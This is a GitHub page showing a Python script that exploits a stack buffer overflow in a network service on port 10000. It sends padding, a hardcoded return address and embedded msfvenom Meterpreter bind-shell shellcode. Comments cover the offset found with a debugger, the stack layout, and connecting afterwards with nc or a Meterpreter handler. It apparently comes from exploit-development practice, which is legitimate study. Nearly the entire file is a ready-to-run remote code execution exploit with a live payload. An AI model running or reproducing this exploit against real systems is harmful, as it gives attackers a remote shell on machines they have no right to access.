-
Notifications
You must be signed in to change notification settings - Fork 7
Expand file tree
/
Copy pathexploitServerMemcpy.py
More file actions
executable file
·73 lines (53 loc) · 2.65 KB
/
Copy pathexploitServerMemcpy.py
File metadata and controls
executable file
·73 lines (53 loc) · 2.65 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/python
#Written in python
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],10000))
buf=""
buf+="A"*268
buf+="\x70\xfb\x22\x00"
#buf+="BBBB" #4 bytes of B after offset found, the exception shown by IMdbg will be that EIP is set to 42424242, which means we overwrote the RET with B's
#These B's should be replaced by the return address to start of our shellcode
#STACK trace
'''
0022FB54 41414141 AAAA
0022FB58 41414141 AAAA
0022FB5C 41414141 AAAA
0022FB60 41414141 AAAA
0022FB64 41414141 AAAA
0022FB68 41414141 AAAA
0022FB6C 42424242 BBBB
0022FB70 43434343 CCCC <---- The stack address our shellcode starts from is 0022FB70, this in reverse (due to little endiannness) will replace B's
0022FB74 44444444 DDDD
'''
#buf+="CCCC" #0022FB70 43434343 CCCC
#msfvenom to generate a payload of choice Eg: msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.59.130 LPORT=44444 -f python
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += b"\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68"
buf += b"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\xad\x9c\x89"
buf += b"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85"
buf += b"\xc0\x75\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68"
buf += b"\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61"
buf += b"\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
buf += b"\xff\xd5\x83\xf8\x00\x7e\x2d\x8b\x36\x6a\x40\x68\x00"
buf += b"\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5"
buf += b"\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff"
buf += b"\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3"
buf += b"\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
buf+="DDDD"
#offset found by pattern generator and ImmunityDBG to be 268
#Once this is done you may use nc or meterpreter handler to connect back or listen depending on the payload you sent.
sock.send(buf)
sock.close()